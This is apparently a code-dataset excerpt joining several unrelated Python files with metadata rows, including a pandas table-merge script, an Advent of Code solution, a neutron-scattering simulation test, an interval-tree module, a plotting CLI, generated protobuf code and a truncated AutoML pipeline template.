if len(right_changeCol_param.split(",")) != 2:
sys.exit("ERROR: values set to `change_right_cols` must " +
"be in the format [old_col_name],[new_column_name]")
rename_right_cols = dict(x.split(",") for x in args.change_right_cols)
right_df = right_df.rename(columns=rename_right_cols)
# 3. Set merge parameters
merge_param={}
if args.how == "antileft":
merge_param['how']="left"
else:
merge_param['how']=args.how
if args.on:
merge_param['on']=args.on
if args.left_on:
merge_param['left_on']=args.left_on
if args.right_on:
merge_param['right_on']=args.right_on
if args.merge_left_index:
merge_param['left_index']=args.merge_left_index
if args.merge_right_index:
merge_param['right_index']=args.merge_right_index
if args.order:
merge_param['sort']=args.order
if args.suffixes:
merge_param['suffixes']=args.suffixes
# 4. Perform Merge
merge_df = left_df.merge(
right_df, **merge_param)
# 4B. There is an extra step for a left anti-join
# 5. Export merged table
out_param={}
out_param["sep"]=args.out_sep
if not args.left_indexCol:
out_param["index"]=False
if args.how == "antileft":
antimerge_df = left_df.loc[merge_df.index,:].copy()
antimerge_df.to_csv(args.out_table, **out_param)
else:
merge_df.to_csv(args.out_table, **out_param)
| 42.467662
| 85
| 0.72493
| 1,376
| 8,536
| 4.330669
| 0.172238
| 0.034737
| 0.065615
| 0.022151
| 0.564189
| 0.513677
| 0.454271
| 0.432119
| 0.356939
| 0.34687
| 0
| 0.006134
| 0.140581
| 8,536
| 201
| 86
| 42.467662
| 0.806161
| 0.055764
| 0
| 0.204819
| 0
| 0
| 0.162898
| 0.007952
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.024096
| 0
| 0.024096
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c971e430652331e744f0b8b0fc1ac07db5704fb9
| 884
|
py
|
Python
|
6.py
|
mattclark-net/aoc21
|
d4dcd78524a8cb27e1445cb6c39e696e64cc4e7a
|
[
"MIT"
] | null | null | null |
6.py
|
mattclark-net/aoc21
|
d4dcd78524a8cb27e1445cb6c39e696e64cc4e7a
|
[
"MIT"
] | null | null | null |
6.py
|
mattclark-net/aoc21
|
d4dcd78524a8cb27e1445cb6c39e696e64cc4e7a
|
[
"MIT"
] | null | null | null |
# parse the input
with open("6-input.txt") as f:
fish = [int(n) for n in f.readline().split(",")]
startcounts = dict(zip(range(0, 9), [0 for x in range(9)]))
for f in fish:
startcounts[f] += 1
def updatedcounts(counts):
newcounts = {}
newcounts[8] = counts[0]
newcounts[7] = counts[8]
newcounts[6] = counts[7] + counts[0]
newcounts[5] = counts[6]
newcounts[4] = counts[5]
newcounts[3] = counts[4]
newcounts[2] = counts[3]
newcounts[1] = counts[2]
newcounts[0] = counts[1]
return newcounts
counts = startcounts
for day in range(80):
print(day, [counts[v] for v in range(9)])
counts = updatedcounts(counts)
print("\n\n", sum(counts.values()), "\n\n")
counts = startcounts
for day in range(256):
print(day, [counts[v] for v in range(9)])
counts = updatedcounts(counts)
print("\n\n", sum(counts.values()), "\n\n")
| 25.257143
| 59
| 0.616516
| 136
| 884
| 4.007353
| 0.308824
| 0.06422
| 0.044037
| 0.084404
| 0.388991
| 0.388991
| 0.278899
| 0.278899
| 0.278899
| 0.278899
| 0
| 0.04539
| 0.202489
| 884
| 34
| 60
| 26
| 0.72766
| 0.016968
| 0
| 0.296296
| 0
| 0
| 0.032295
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037037
| false
| 0
| 0
| 0
| 0.074074
| 0.148148
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c97337433ecaa8303091ad4ba921fe29802304f0
| 3,287
|
py
|
Python
|
packages/mccomponents/tests/mccomponents/sample/samplecomponent_SQkernel_TestCase.py
|
mcvine/mcvine
|
42232534b0c6af729628009bed165cd7d833789d
|
[
"BSD-3-Clause"
] | 5
|
2017-01-16T03:59:47.000Z
|
2020-06-23T02:54:19.000Z
|
packages/mccomponents/tests/mccomponents/sample/samplecomponent_SQkernel_TestCase.py
|
mcvine/mcvine
|
42232534b0c6af729628009bed165cd7d833789d
|
[
"BSD-3-Clause"
] | 293
|
2015-10-29T17:45:52.000Z
|
2022-01-07T16:31:09.000Z
|
packages/mccomponents/tests/mccomponents/sample/samplecomponent_SQkernel_TestCase.py
|
mcvine/mcvine
|
42232534b0c6af729628009bed165cd7d833789d
|
[
"BSD-3-Clause"
] | 1
|
2019-05-25T00:53:31.000Z
|
2019-05-25T00:53:31.000Z
|
#!/usr/bin/env python
#
#
standalone = True
import os, numpy as np
os.environ['MCVINE_MPI_BINDING'] = 'NONE'
import unittestX as unittest
class TestCase(unittest.TestCase):
def test1(self):
'mccomponents.sample.samplecomponent: SQkernel'
# The kernel spec is in sampleassemblies/V-sqkernel/V-scatterer.xml
# It is a flat kernel S(Q)=1.
# So the simulation result should have a flat S(Q) too.
# The following code run a simulation with
# (1) monochromatic source (2) sample (3) IQE_monitor
# After the simulation, it test the S(Q) by
# (1) do a manual "reduction" using the simulated scattered neutrons, and
# (2) examine the monitor data
import mcni
from mcni.utils import conversion
# instrument
# 1. source
from mcni.components.MonochromaticSource import MonochromaticSource
ei = 60.
vil = conversion.e2v(ei)
vi = (0,0,vil)
neutron = mcni.neutron(r = (0,0,0), v = vi, time = 0, prob = 1 )
component1 = MonochromaticSource('source', neutron)
# 2. sample
from mccomponents.sample import samplecomponent
component2 = samplecomponent( 'sample', 'sampleassemblies/V-sqkernel/sampleassembly.xml' )
# 3. monitor
import mcstas2
component3 = mcstas2.componentfactory('monitors', 'IQE_monitor')(
name='monitor', Ei=ei, Qmin=0, Qmax=8., Emin=-10., Emax=10., nQ=20, nE=20)
# instrument and geometer
instrument = mcni.instrument( [component1, component2, component3] )
geometer = mcni.geometer()
geometer.register( component1, (0,0,0), (0,0,0) )
geometer.register( component2, (0,0,1), (0,0,0) )
geometer.register( component3, (0,0,1), (0,0,0) )
# neutron buffer
N0 = 10000
neutrons = mcni.neutron_buffer(N0)
#
# simulate
import mcni.SimulationContext
workdir = "tmp.SQkernel"
if os.path.exists(workdir):
import shutil; shutil.rmtree(workdir)
sim_context = mcni.SimulationContext.SimulationContext(outputdir=workdir)
mcni.simulate( instrument, geometer, neutrons, context=sim_context )
#
# check 1: directly calculate I(Q) from neutron buffer
from mcni.neutron_storage import neutrons_as_npyarr
narr = neutrons_as_npyarr(neutrons); narr.shape = N0, 10
v = narr[:, 3:6]; p = narr[:, 9]
delta_v_vec = -v + vi; delta_v = np.linalg.norm(delta_v_vec, axis=-1)
Q = conversion.V2K * delta_v
I, qbb = np.histogram(Q, 20, weights=p)
qbc = (qbb[1:] + qbb[:-1])/2
I=I/qbc; I/=np.mean(I)
self.assertTrue(1.0*np.isclose(I, 1., atol=0.1).size/I.size>0.9)
#
# check 2: use data in IQE monitor
import histogram.hdf as hh
iqe = hh.load(os.path.join(workdir, 'stepNone', 'iqe_monitor.h5'))
iq = iqe.sum('energy')
Q = iq.Q; I = iq.I
I0 = np.mean(I); I/=I0
# check that most of the intensity is similar to I0
self.assertTrue(1.0*np.isclose(I, 1., atol=0.1).size/I.size>0.9)
return
pass # end of TestCase
if __name__ == "__main__": unittest.main()
# End of file
| 35.728261
| 98
| 0.606632
| 434
| 3,287
| 4.532258
| 0.391705
| 0.014235
| 0.010676
| 0.006101
| 0.070158
| 0.050839
| 0.044738
| 0.044738
| 0.044738
| 0.044738
| 0
| 0.041509
| 0.274414
| 3,287
| 91
| 99
| 36.120879
| 0.783229
| 0.214177
| 0
| 0.039216
| 0
| 0
| 0.07648
| 0.031514
| 0
| 0
| 0
| 0
| 0.039216
| 1
| 0.019608
| false
| 0.019608
| 0.215686
| 0
| 0.27451
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9743d63b6769b341831d17f36b94f9161097eb4
| 5,811
|
py
|
Python
|
differannotate/datastructures.py
|
zyndagj/differannotate
|
c73d9df5f82f1cf97340235265a368b16da9c89b
|
[
"BSD-3-Clause"
] | null | null | null |
differannotate/datastructures.py
|
zyndagj/differannotate
|
c73d9df5f82f1cf97340235265a368b16da9c89b
|
[
"BSD-3-Clause"
] | null | null | null |
differannotate/datastructures.py
|
zyndagj/differannotate
|
c73d9df5f82f1cf97340235265a368b16da9c89b
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
#
###############################################################################
# Author: Greg Zynda
# Last Modified: 12/11/2019
###############################################################################
# BSD 3-Clause License
#
# Copyright (c) 2019, Greg Zynda
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
###############################################################################
from quicksect import IntervalTree
import logging
from differannotate.constants import FORMAT
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.WARN, format=FORMAT)
class dict_index(dict):
'''
A modified dictionary class meant to store and increment unique values
IDs as values are retrieved from keys.
# Usage
>>> DI = dict_index()
>>> DI['cat']
0
>>> DI['bear']
1
>>> DI['cat']
0
>>> DI['cat'] = 10
>>> DI['cat']
0
>>> DI.getkey(0)
'cat'
>>> DI.getkey(1)
'bear'
>>> DI.getkey(2)
Traceback (most recent call last):
...
KeyError: 2
>>> DI.getkey('dog')
Traceback (most recent call last):
...
TypeError: dog
'''
def __init__(self):
super(dict_index,self).__init__()
self.cur = 0
def __getitem__(self, key):
try:
return super(dict_index,self).__getitem__(key)
except:
super(dict_index,self).__setitem__(key, self.cur)
self.cur += 1
return super(dict_index,self).__getitem__(key)
def __setitem__(self, key, value):
pass
def getkey(self, val):
'''
# Parameters
val (int): Should be < len(dict_index)
# Raises
TypeError: if val is not an integer
KeyError: if val does not exist as a value in the dict_index
'''
if not isinstance(val, int):
raise TypeError(val)
if val >= self.cur:
raise KeyError(val)
keys = super(dict_index,self).keys()
vals = super(dict_index,self).values()
return keys[vals.index(val)]
class iterit(IntervalTree):
def __init__(self):
super(iterit,self).__init__()
self.min = None
self.max = None
self.set_cache = {}
def add(self, start, end, other=None):
if self.min == None:
self.min = start
self.max = end
else:
if start < self.min:
self.min = start
if end > self.max:
self.max = end
super(iterit,self).add(start, end, other)
def iterintervals(self):
return super(iterit,self).search(self.min, self.max)
def iifilter(self, eid, col, strand=False):
'''
>>> IT = iterit()
>>> IT.add(0, 10, (0, 0))
>>> IT.add(5, 15, (1, 1))
>>> IT.add(10, 20, (1, 2))
>>> ret = IT.iifilter(1,0)
>>> len(ret)
2
>>> for i in map(interval2tuple, ret): print i
(5, 15, 1, 1)
(10, 20, 1, 2)
'''
assert(col >= 1)
if _strand(strand):
sid = _get_strand(strand)
return list(filter(lambda x: len(x.data) > col and x.data[col] == eid and x.data[0] == sid, self.iterintervals()))
else:
return list(filter(lambda x: len(x.data) > col and x.data[col] == eid, self.iterintervals()))
def searchfilter(self, start, end, eid, col, strand=False):
assert(col >= 1)
if _strand(strand):
sid = _get_strand(strand)
return list(filter(lambda x: len(x.data) > col and x.data[col] == eid and x.data[0] == sid, super(iterit,self).search(start, end)))
else:
return list(filter(lambda x: len(x.data) > col and x.data[col] == eid, super(iterit,self).search(start, end)))
def to_set(self,eid=False, col=False, strand=False):
cache_name = (eid, col, strand)
if cache_name in self.set_cache:
return self.set_cache[cache_name].copy()
if eid or col or strand:
ret = set(map(interval2tuple, self.iifilter(eid, col, strand)))
else:
ret = set(map(interval2tuple, self.iterintervals()))
self.set_cache[cache_name] = ret
return ret.copy()
def _strand(strand):
return not isinstance(strand, bool)
strand_dict = {'+':0, '-':1, 0:'+', 1:'-'}
def _get_strand(strand):
if isinstance(strand, int):
return strand
elif isinstance(strand, str):
return strand_dict[strand]
else:
raise ValueError(strand)
def interval2tuple(interval):
'''
Converts an interval to a tuple
# Usage
>>> IT = iterit()
>>> IT.add(0, 10, (0, 0))
>>> IT.add(5, 15, (1, 1))
>>> for i in map(interval2tuple, IT.iterintervals()): print i
(0, 10, 0, 0)
(5, 15, 1, 1)
'''
if interval.data:
return (interval.start, interval.end)+tuple(interval.data)
else:
return (interval.start, interval.end)
if __name__ == "__main__":
import doctest
doctest.testmod()
| 30.584211
| 134
| 0.66202
| 837
| 5,811
| 4.502987
| 0.293907
| 0.023879
| 0.016981
| 0.028655
| 0.24675
| 0.166092
| 0.150703
| 0.132661
| 0.132661
| 0.132661
| 0
| 0.018257
| 0.170539
| 5,811
| 189
| 135
| 30.746032
| 0.763693
| 0.441404
| 0
| 0.232558
| 0
| 0
| 0.004168
| 0
| 0
| 0
| 0
| 0
| 0.023256
| 1
| 0.151163
| false
| 0.011628
| 0.046512
| 0.023256
| 0.395349
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c9743e069ad8fe0a795c53358dc5e0951de0d7c7
| 2,113
|
py
|
Python
|
examples/regional_constant_preservation/plotCurve.py
|
schoonovernumerics/FEOTs
|
d8bf24d0e0c23a9ee65e2be6a75f5dbc83d3e5ad
|
[
"BSD-3-Clause"
] | null | null | null |
examples/regional_constant_preservation/plotCurve.py
|
schoonovernumerics/FEOTs
|
d8bf24d0e0c23a9ee65e2be6a75f5dbc83d3e5ad
|
[
"BSD-3-Clause"
] | 13
|
2017-08-03T22:30:25.000Z
|
2019-01-23T16:32:28.000Z
|
examples/regional_constant_preservation/plotCurve.py
|
schoonovernumerics/FEOTS
|
d8bf24d0e0c23a9ee65e2be6a75f5dbc83d3e5ad
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python3
DOC="""plotCurve
plotCurve is used to create vertical profiles of different lateral ylabel statistics of FEOTS output.
Usage:
plotCurve plot <file> [--out=<out>] [--opts=<opts>] [--scalex=<scalex>] [--xlabel=<xlabel>] [--ylabel=<ylabel>]
Commands:
plot Create a vertical profile plot of the chosen statistics for the given FEOTS output ylabel.
Options:
-h --help Display this help screen
--out=<out> The path to place the output files [default: ./]
--opts=<opts> Comma separated list of plot options. [default: none]
--scalex=<scalex> Amount to scale the x dimension by for the plot (multiplicative). [default: 1.0]
--xlabel=<xlabel> Label for the x-dimension in the plot. [default: x]
--ylabel=<ylabel> Label for the y-dimension in the plot. [default: y]
"""
import numpy as np
from matplotlib import pyplot as plt
from docopt import docopt
import feotsPostProcess as feots
def parse_cli():
args = docopt(DOC,version='plotCurve 0.0.0')
return args
#END parse_cli
def loadCurve(filename):
curveData = np.loadtxt(filename, delimiter=",", skiprows=1)
return curveData
#END loadCurve
def plotCurve(curveData, opts, scalex, xlabel, ylabel, plotfile):
f, ax = plt.subplots()
ax.fillbetween(curveData[:,0]*scalex,curveData[:,1], color=(0.8,0.8,0.8,0.8))
ax.plot(curveData[:,0]*scalex, curveData[:,1], marker='', color='black', linewidth=2)
if 'logx' in opts:
ax.set(xscale='log')
if 'logy' in opts:
ax.set(yscale='log')
ax.grid(color='gray', linestyle='-', linewidth=1)
ax.set(xlabel=xlabel, ylabel=ylabel)
f.savefig(plotfile)
plt.close('all')
#END plotCurve
def main():
args = parse_cli()
if args['plot'] :
xlabel = args['--xlabel']
scalex = args['--scalex']
ylabel = args['--ylabel']
opts = args['--opts'].split(',')
curveData = loadCurve(args['<file>'])
outFile = args['--out']
plotCurve(curveData, opts, scalex, xlabel, ylabel, outFile)
#END main
if __name__ == '__main__':
main()
| 26.08642
| 114
| 0.644108
| 284
| 2,113
| 4.753521
| 0.380282
| 0.035556
| 0.006667
| 0.008889
| 0.140741
| 0.065185
| 0
| 0
| 0
| 0
| 0
| 0.012507
| 0.205395
| 2,113
| 80
| 115
| 26.4125
| 0.791543
| 0.030289
| 0
| 0
| 0
| 0.041667
| 0.462818
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.083333
| 0
| 0.208333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c974860e7717afdaa174abddb3959a9916ac8f90
| 6,535
|
py
|
Python
|
statefun-examples/statefun-python-walkthrough-example/walkthrough_pb2.py
|
authuir/flink-statefun
|
ca16055de31737a8a0073b8f9083268fc24b9828
|
[
"Apache-2.0"
] | 1
|
2020-05-27T03:38:36.000Z
|
2020-05-27T03:38:36.000Z
|
statefun-examples/statefun-python-walkthrough-example/walkthrough_pb2.py
|
authuir/flink-statefun
|
ca16055de31737a8a0073b8f9083268fc24b9828
|
[
"Apache-2.0"
] | null | null | null |
statefun-examples/statefun-python-walkthrough-example/walkthrough_pb2.py
|
authuir/flink-statefun
|
ca16055de31737a8a0073b8f9083268fc24b9828
|
[
"Apache-2.0"
] | null | null | null |
################################################################################
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: walkthrough.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='walkthrough.proto',
package='walkthrough',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x11walkthrough.proto\x12\x0bwalkthrough\"\x16\n\x05Hello\x12\r\n\x05world\x18\x01 \x01(\t\"\x0e\n\x0c\x41notherHello\"\x18\n\x07\x43ounter\x12\r\n\x05value\x18\x01 \x01(\x03\"\x1d\n\nHelloReply\x12\x0f\n\x07message\x18\x01 \x01(\t\"\x07\n\x05\x45ventb\x06proto3')
)
_HELLO = _descriptor.Descriptor(
name='Hello',
full_name='walkthrough.Hello',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='world', full_name='walkthrough.Hello.world', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=34,
serialized_end=56,
)
_ANOTHERHELLO = _descriptor.Descriptor(
name='AnotherHello',
full_name='walkthrough.AnotherHello',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=58,
serialized_end=72,
)
_COUNTER = _descriptor.Descriptor(
name='Counter',
full_name='walkthrough.Counter',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='value', full_name='walkthrough.Counter.value', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=74,
serialized_end=98,
)
_HELLOREPLY = _descriptor.Descriptor(
name='HelloReply',
full_name='walkthrough.HelloReply',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='message', full_name='walkthrough.HelloReply.message', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=100,
serialized_end=129,
)
_EVENT = _descriptor.Descriptor(
name='Event',
full_name='walkthrough.Event',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=131,
serialized_end=138,
)
DESCRIPTOR.message_types_by_name['Hello'] = _HELLO
DESCRIPTOR.message_types_by_name['AnotherHello'] = _ANOTHERHELLO
DESCRIPTOR.message_types_by_name['Counter'] = _COUNTER
DESCRIPTOR.message_types_by_name['HelloReply'] = _HELLOREPLY
DESCRIPTOR.message_types_by_name['Event'] = _EVENT
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Hello = _reflection.GeneratedProtocolMessageType('Hello', (_message.Message,), dict(
DESCRIPTOR = _HELLO,
__module__ = 'walkthrough_pb2'
# @@protoc_insertion_point(class_scope:walkthrough.Hello)
))
_sym_db.RegisterMessage(Hello)
AnotherHello = _reflection.GeneratedProtocolMessageType('AnotherHello', (_message.Message,), dict(
DESCRIPTOR = _ANOTHERHELLO,
__module__ = 'walkthrough_pb2'
# @@protoc_insertion_point(class_scope:walkthrough.AnotherHello)
))
_sym_db.RegisterMessage(AnotherHello)
Counter = _reflection.GeneratedProtocolMessageType('Counter', (_message.Message,), dict(
DESCRIPTOR = _COUNTER,
__module__ = 'walkthrough_pb2'
# @@protoc_insertion_point(class_scope:walkthrough.Counter)
))
_sym_db.RegisterMessage(Counter)
HelloReply = _reflection.GeneratedProtocolMessageType('HelloReply', (_message.Message,), dict(
DESCRIPTOR = _HELLOREPLY,
__module__ = 'walkthrough_pb2'
# @@protoc_insertion_point(class_scope:walkthrough.HelloReply)
))
_sym_db.RegisterMessage(HelloReply)
Event = _reflection.GeneratedProtocolMessageType('Event', (_message.Message,), dict(
DESCRIPTOR = _EVENT,
__module__ = 'walkthrough_pb2'
# @@protoc_insertion_point(class_scope:walkthrough.Event)
))
_sym_db.RegisterMessage(Event)
# @@protoc_insertion_point(module_scope)
| 28.413043
| 286
| 0.72303
| 757
| 6,535
| 5.976222
| 0.253633
| 0.024757
| 0.041777
| 0.028736
| 0.421972
| 0.387268
| 0.387268
| 0.387268
| 0.378868
| 0.31145
| 0
| 0.021739
| 0.1342
| 6,535
| 229
| 287
| 28.537118
| 0.777837
| 0.189135
| 0
| 0.613636
| 0
| 0.005682
| 0.142801
| 0.075313
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.028409
| 0
| 0.028409
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c978b614564b15ad98ff9be9b231eda20bb8f13d
| 6,405
|
py
|
Python
|
python/dsbox/template/template_files/loaded/SRIClassificationTemplate.py
|
usc-isi-i2/dsbox-ta2
|
85e0e8f5bbda052fa77cb98f4eef1f4b50909fd2
|
[
"MIT"
] | 7
|
2018-05-10T22:19:44.000Z
|
2020-07-21T07:28:39.000Z
|
python/dsbox/template/template_files/loaded/SRIClassificationTemplate.py
|
usc-isi-i2/dsbox-ta2
|
85e0e8f5bbda052fa77cb98f4eef1f4b50909fd2
|
[
"MIT"
] | 187
|
2018-04-13T17:19:24.000Z
|
2020-04-21T00:41:15.000Z
|
python/dsbox/template/template_files/loaded/SRIClassificationTemplate.py
|
usc-isi-i2/dsbox-ta2
|
85e0e8f5bbda052fa77cb98f4eef1f4b50909fd2
|
[
"MIT"
] | 7
|
2018-07-10T00:14:07.000Z
|
2019-07-25T17:59:44.000Z
|
from dsbox.template.template import DSBoxTemplate
from d3m.metadata.problem import TaskKeyword
from dsbox.template.template_steps import TemplateSteps
from dsbox.schema import SpecializedProblem
import typing
import numpy as np # type: ignore
class SRIClassificationTemplate(DSBoxTemplate):
def __init__(self):
DSBoxTemplate.__init__(self)
self.template = {
"weight": 30,
"name": "SRI_classification_template",
"taskSubtype": {TaskKeyword.VERTEX_CLASSIFICATION.name},
"taskType": {TaskKeyword.VERTEX_CLASSIFICATION.name},
# "taskType": {TaskKeyword.VERTEX_CLASSIFICATION.name, TaskKeyword.COMMUNITY_DETECTION.name, TaskKeyword.LINK_PREDICTION.name, TaskKeyword.TIME_SERIES.name},
# "taskSubtype": {"NONE", TaskKeyword.NONOVERLAPPING.name, TaskKeyword.OVERLAPPING.name, TaskKeyword.MULTICLASS.name, TaskKeyword.BINARY.name, TaskKeyword.MULTILABEL.name, TaskKeyword.MULTIVARIATE.name, TaskKeyword.UNIVARIATE.name, TaskKeyword.TIME_SERIES.name},
#"inputType": "table",
"inputType": {"edgeList", "graph", "table"},
"output": "prediction_step",
"steps": [
{
"name": "text_reader_step",
"primitives": ["d3m.primitives.data_preprocessing.dataset_text_reader.DatasetTextReader"],
"inputs": ["template_input"]
},
{
"name": "denormalize_step",
"primitives": ["d3m.primitives.data_transformation.denormalize.Common"],
"inputs": ["text_reader_step"]
},
{
"name": "to_dataframe_step",
"primitives": ["d3m.primitives.data_transformation.dataset_to_dataframe.Common"],
"inputs": ["denormalize_step"]
},
{
"name": "common_profiler_step",
"primitives": ["d3m.primitives.schema_discovery.profiler.Common"],
"inputs": ["to_dataframe_step"]
},
{
"name": "parser_step",
"primitives": ["d3m.primitives.data_transformation.column_parser.Common"],
"inputs": ["common_profiler_step"]
},
{
"name": "pre_extract_target_step",
"primitives": [{
"primitive": "d3m.primitives.data_transformation.extract_columns_by_semantic_types.Common",
"hyperparameters":
{
'semantic_types': ('https://metadata.datadrivendiscovery.org/types/TrueTarget',),
'use_columns': (),
'exclude_columns': ()
}
}],
"inputs": ["parser_step"]
},
{
"name": "extract_target_step",
"primitives": ["d3m.primitives.data_transformation.simple_column_parser.DataFrameCommon"],
"inputs": ["pre_extract_target_step"]
},
{
"name": "extract_attribute_step",
"primitives": [{
"primitive": "d3m.primitives.data_transformation.extract_columns_by_semantic_types.Common",
"hyperparameters":
{
'semantic_types': ('https://metadata.datadrivendiscovery.org/types/Attribute',),
}
}],
"inputs": ["parser_step"]
},
{
"name": "data_conditioner_step",
"primitives": [{
"primitive": "d3m.primitives.data_transformation.conditioner.Conditioner",
"hyperparameters":
{
"ensure_numeric":[True],
"maximum_expansion": [30]
}
}],
"inputs": ["extract_attribute_step"]
},
{
"name": "model_step",
"primitives": [
{
"primitive": "d3m.primitives.classification.bernoulli_naive_bayes.SKlearn",
"hyperparameters": {
'alpha': [0.1, 1.0],
'binarize': [0.0],
'fit_prior': [False],
'return_result': ["new"],
'use_semantic_types': [False],
'add_index_columns': [False],
'error_on_no_input':[True],
}
},
{
"primitive": "d3m.primitives.regression.gradient_boosting.SKlearn",
"hyperparameters": {
'max_depth': [5, 8],
'learning_rate': [0.3, 0.5],
'min_samples_split': [2, 3, 6],
